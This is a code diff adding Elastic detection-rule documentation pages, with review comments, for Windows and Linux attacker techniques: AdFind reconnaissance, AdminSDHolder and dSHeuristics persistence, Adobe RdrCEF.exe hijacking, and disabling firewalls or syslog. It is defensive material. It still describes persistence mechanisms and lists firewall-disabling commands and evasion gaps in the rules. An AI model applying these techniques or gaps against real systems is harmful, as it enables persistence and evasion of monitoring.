+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "attrib.exe" or process.pe.original_file_name == "ATTRIB.EXE") and process.args : "+h" and + not + (process.parent.name: "cmd.exe" and + process.command_line: "attrib +R +H +S +A *.cui" and + process.parent.command_line: "?:\\WINDOWS\\system32\\cmd.exe /c \"?:\\WINDOWS\\system32\\*.bat\"") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: Hidden Files and Directories +** ID: T1564.001 +** Reference URL: https://attack.mitre.org/techniques/T1564/001/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Sub-technique: +** Name: Windows File and Directory Permissions Modification +** ID: T1222.001 +** Reference URL: https://attack.mitre.org/techniques/T1222/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ 
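Review bot: In the *Framework* block for Adding Hidden File Attribute via Attrib, the final `* Tactic: Persistence` entry has no Technique or Sub-technique beneath it although the rule is tagged "Tactic: Persistence"; either add the technique that justifies the tag or drop the tactic. The false positive section states "This activity is unlikely to happen legitimately", yet the query ships with a hard-coded benign exclusion (`process.command_line: "attrib +R +H +S +A *.cui"` under a `cmd.exe` running a `system32` batch file), so documenting that known benign case in the guide would keep the two consistent. In the osquery snippet "Retrieve Services Running on User Accounts", `user_account == null` compares against SQL NULL and never evaluates true; `user_account IS NULL` is the form that expresses the intended check.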
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adfind-command-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adfind-command-activity.asciidoc new file mode 100644 index 0000000000..15088feb8c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adfind-command-activity.asciidoc 
@@ -0,0 +1,144 @@ +[[prebuilt-rule-8-10-5-adfind-command-activity]] +=== AdFind Command Activity + +This rule detects the Active Directory query tool, AdFind.exe. AdFind has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For Winlogbeat, this rule requires Sysmon. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://www.joeware.net/freetools/tools/adfind/ +* https://thedfirreport.com/2020/05/08/adfind-recon/ +* https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html +* https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware +* https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html +* https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Discovery +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating AdFind Command Activity + +[AdFind](http://www.joeware.net/freetools/tools/adfind/) is a freely available command-line tool used to retrieve information from Active Directory (AD). 
Network discovery and enumeration tools like `AdFind` are useful to adversaries in the same ways they are effective for network administrators. This tool provides quick ability to scope AD person/computer objects and understand subnets and domain information. There are many [examples](https://thedfirreport.com/category/adfind/) of this tool being adopted by ransomware and criminal groups and used in compromises. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Examine the command line to determine what information was retrieved by the tool. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. + +### False positive analysis + +- This rule has a high chance to produce false positives as it is a legitimate tool used by network administrators. +- If this rule is noisy in your environment due to expected activity, consider adding exceptions — preferably with a combination of user and command line conditions. +- Malicious behavior with `AdFind` should be investigated as part of a step within an attack chain. It doesn't happen in isolation, so reviewing previous logs/activity from impacted machines can be very telling. + +### Related rules + +- Windows Network Enumeration - 7b8bfc26-81d2-435e-965c-d722ee397ef1 +- Enumeration of Administrator Accounts - 871ea072-1b71-4def-b016-6278b505138d +- Enumeration Command Spawned via WMIPrvSE - 770e0c4d-b998-41e5-a62e-c7901fd7f470 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. 
+- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "AdFind.exe" or process.pe.original_file_name == "AdFind.exe") and + process.args : ("objectcategory=computer", "(objectcategory=computer)", + "objectcategory=person", "(objectcategory=person)", + "objectcategory=subnet", "(objectcategory=subnet)", + "objectcategory=group", "(objectcategory=group)", + "objectcategory=organizationalunit", "(objectcategory=organizationalunit)", + "objectcategory=attributeschema", "(objectcategory=attributeschema)", + "domainlist", "dcmodes", "adinfo", "dclist", "computers_pwnotreqd", "trustdmp") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Remote System Discovery +** ID: T1018 +** Reference URL: https://attack.mitre.org/techniques/T1018/ +* Technique: +** Name: Permission Groups Discovery +** ID: T1069 +** Reference URL: https://attack.mitre.org/techniques/T1069/ +* Sub-technique: +** Name: Domain Groups +** ID: T1069.002 +** Reference URL: 
https://attack.mitre.org/techniques/T1069/002/ +* Technique: +** Name: Account Discovery +** ID: T1087 +** Reference URL: https://attack.mitre.org/techniques/T1087/ +* Sub-technique: +** Name: Domain Account +** ID: T1087.002 +** Reference URL: https://attack.mitre.org/techniques/T1087/002/ +* Technique: +** Name: Domain Trust Discovery +** ID: T1482 +** Reference URL: https://attack.mitre.org/techniques/T1482/ +* Technique: +** Name: System Network Configuration Discovery +** ID: T1016 +** Reference URL: https://attack.mitre.org/techniques/T1016/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-backdoor.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-backdoor.asciidoc new file mode 100644 index 0000000000..9147a48648 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-backdoor.asciidoc 
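Review bot: The description says the AdFind Command Activity rule "detects the Active Directory query tool, AdFind.exe", but the query requires one of a fixed list of argument values (`objectcategory=computer`, `domainlist`, `dclist`, `trustdmp` and so on) alongside the process name or original file name, so an AdFind run with other arguments does not match; the description and the false positive section ("This rule has a high chance to produce false positives") should reflect that the rule is scoped to specific reconnaissance queries rather than any execution of the tool. Related: because `process.args` is compared with exact values, every `objectcategory=` filter is listed twice, with and without parentheses; a comment in the query explaining why both spellings are enumerated would help anyone extending the list.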
@@ -0,0 +1,74 @@ +[[prebuilt-rule-8-10-5-adminsdholder-backdoor]] +=== AdminSDHolder Backdoor + +Detects modifications in the AdminSDHolder object. Attackers can abuse the SDProp process to implement a persistent backdoor in Active Directory. SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, regaining their Administrative Privileges. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://adsecurity.org/?p=1906 +* https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory#adminsdholder + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Use Case: Active Directory Monitoring +* Data Source: Active Directory + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.action:"Directory Service Changes" and event.code:5136 and + winlog.event_data.ObjectDN:CN=AdminSDHolder,CN=System* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: 
https://attack.mitre.org/techniques/T1078/002/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added.asciidoc new file mode 100644 index 0000000000..95bfeaa547 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added.asciidoc 
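Review bot: The AdminSDHolder Backdoor rule depends on Directory Service Changes auditing (`event.action:"Directory Service Changes" and event.code:5136`), but unlike the LDAP attribute rule earlier in this patch it carries no Investigation guide or setup note telling users which audit subcategory must be enabled for these events to exist; without that, the rule silently never fires. This file is also a `query` rule while its neighbours are `eql`, and it compares `event.code` as a number (`5136`) where the EQL rules use strings (`"5136"`, `"4662"`); a brief comment would stop a maintainer from "fixing" one form to match the other. Minor: "regaining their Administrative Privileges" should not be capitalised.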
@@ -0,0 +1,121 @@ +[[prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added]] +=== AdminSDHolder SDProp Exclusion Added + +Identifies a modification on the dsHeuristics attribute on the bit that holds the configuration of groups excluded from the SDProp process. The SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, meaning that groups excluded will remain unchanged. Attackers can abuse this misconfiguration to maintain long-term access to privileged accounts in these groups. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad +* https://petri.com/active-directory-security-understanding-adminsdholder-object + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Active Directory +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating AdminSDHolder SDProp Exclusion Added + +The SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. 
If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object. + +The dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory. + +Administrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s): + +- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001). + +The usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges. + +This rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account and system owners and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field: + - Account Operators eq 1 + - Server Operators eq 2 + - Print Operators eq 4 + - Backup Operators eq 8 + The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit. + +### False positive analysis + +- While this modification can be done legitimately, it is not a best practice. 
Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group. + +### Response and remediation + +- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where event.action == "Directory Service Changes" and + event.code == "5136" and + winlog.event_data.AttributeLDAPDisplayName : "dSHeuristics" and + length(winlog.event_data.AttributeValue) > 15 and + winlog.event_data.AttributeValue regex~ "[0-9]{15}([1-9a-f]).*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adobe-hijack-persistence.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adobe-hijack-persistence.asciidoc new file mode 100644 index 0000000000..5e85be5f9c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adobe-hijack-persistence.asciidoc 
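Review bot: (AdminSDHolder SDProp Exclusion Added) the description and investigation guide call the dwAdminSDExMask position a "bit" ("on the bit that holds the configuration", "setting the 16th bit", "the 16th bit is set to a value other than zero", "dwAdminSDExMask (16th bit)") while the worked example and the query treat it as the 16th character of the dSHeuristics string (`[0-9]{15}([1-9a-f]).*`); a position that takes values 0 to f is a hex character, not a bit, so use "16th character" consistently. Separately, the query matches any 5136 event whose AttributeValue has a non-zero 16th character, and reverting the exclusion (the remediation step that sets it back to 0) is logged as a Value Deleted 5136 event carrying the old string, so the fix itself will re-alert; restricting on the 5136 OperationType (%%14674, Value Added) would avoid that.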
@@ -0,0 +1,132 @@ +[[prebuilt-rule-8-10-5-adobe-hijack-persistence]] +=== Adobe Hijack Persistence + +Detects writing executable files that will be automatically launched by Adobe on launch. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://twitter.com/pabraeken/status/997997818362155008 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Adobe Hijack Persistence + +Attackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate other alerts associated with the user/host during the past 48 hours. 
+- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet 
and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "creation" and + file.path : ("?:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.exe", + "?:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.exe") and + not process.name : "msiexec.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Services File Permissions Weakness +** ID: T1574.010 +** Reference URL: https://attack.mitre.org/techniques/T1574/010/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall.asciidoc new file mode 100644 index 0000000000..b929954640 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall.asciidoc 
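Review bot: (Adobe Hijack Persistence) the investigation step "searching for login events (for example, 4624) to the target host after the registry modification" was carried over from a registry-based guide; this rule fires on a file creation, so the step should anchor on the `RdrCEF.exe` write time instead. The query also only matches `event.type == "creation"`, so an in-place overwrite of the existing `RdrCEF.exe` or a rename of a staged binary onto that path is not covered; consider adding the change/rename event types, and the one-line description ("writing executable files that will be automatically launched by Adobe on launch") should name the file and the trigger, as the guide does.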
@@ -0,0 +1,78 @@ +[[prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall]] +=== Attempt to Disable IPTables or Firewall + +Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and + ( + /* disable FW */ + ( + (process.name == "ufw" and process.args == "disable") or + (process.name == "iptables" and process.args == "-F" and process.args_count == 2) + ) or + + /* stop FW service */ + ( + ((process.name == "service" and process.args == "stop") or + (process.name == "chkconfig" and process.args == "off") or + (process.name == "systemctl" and process.args in ("disable", "stop", "kill"))) and + process.args in ("firewalld", "ip6tables", "iptables") + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ 
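Review bot: (Attempt to Disable IPTables or Firewall) the "disable FW" branch only matches the exact two-argument form `iptables -F` (`process.args == "-F" and process.args_count == 2`), so `iptables --flush`, a table-scoped flush such as `iptables -t filter -F`, `ip6tables -F`, and a policy change like `iptables -P INPUT ACCEPT` all fall outside the rule, while the "stop FW service" branch does list `ip6tables`; either state in the description that the first branch is deliberately narrow to limit noise or extend it to `ip6tables` and the `--flush` long form. The rule also keys only on `event.action == "exec"` and `logs-endpoint.events.*`, unlike the sibling Linux rules in this package that accept `exec_event` and `endgame-*`; if that is intentional, say so in the description so nobody expects Endgame coverage.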
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-syslog-service.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-syslog-service.asciidoc new file mode 100644 index 0000000000..fcb36a80ea --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-syslog-service.asciidoc 
@@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-attempt-to-disable-syslog-service]] +=== Attempt to Disable Syslog Service + +Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and + ( (process.name == "service" and process.args == "stop") or + (process.name == "chkconfig" and process.args == "off") or + (process.name == "systemctl" and process.args in ("disable", "stop", "kill")) + ) and process.args in ("syslog", "rsyslog", "syslog-ng") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ 
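Review bot: (Attempt to Disable Syslog Service) the description has a duplicated phrase, "in an attempt to an attempt to disrupt event logging"; drop one copy. In the query, `process.args in ("syslog", "rsyslog", "syslog-ng")` is an exact match, so `systemctl stop rsyslog.service` (the unit name with its `.service` suffix, which systemctl accepts and shell completion produces) does not match; adding the suffixed forms, and `systemd-journald` if journald is in scope, would close that gap.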
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity.asciidoc new file mode 100644 index 0000000000..9ea5746f47 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity.asciidoc 
@@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity]] +=== Base16 or Base32 Encoding/Decoding Activity + +Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls. + +*Rule type*: query + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:(start or process_started) and + process.name:(base16 or base32 or base32plain or base32hex) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Obfuscated Files or Information +** ID: T1027 +** Reference URL: https://attack.mitre.org/techniques/T1027/ +* Technique: +** Name: Deobfuscate/Decode Files or Information +** ID: T1140 +** Reference URL: https://attack.mitre.org/techniques/T1140/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bash-shell-profile-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bash-shell-profile-modification.asciidoc new file mode 100644 index 0000000000..ae030529e3 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bash-shell-profile-modification.asciidoc 
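Review bot: (Base16 or Base32 Encoding/Decoding Activity) the query keys only on `process.name:(base16 or base32 or base32plain or base32hex)`; on current coreutils the same encodings are also exposed through `basenc` (`basenc --base16`, `--base32`, `--base32hex`), which this rule never sees, so a `basenc` clause with those arguments is worth adding. Of the four names, `base32` is the coreutils binary while `base16`, `base32plain` and `base32hex` are not standard coreutils commands; since the page lists *References*: None, a reference saying which toolkits provide them would tell an analyst what a hit should look like.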
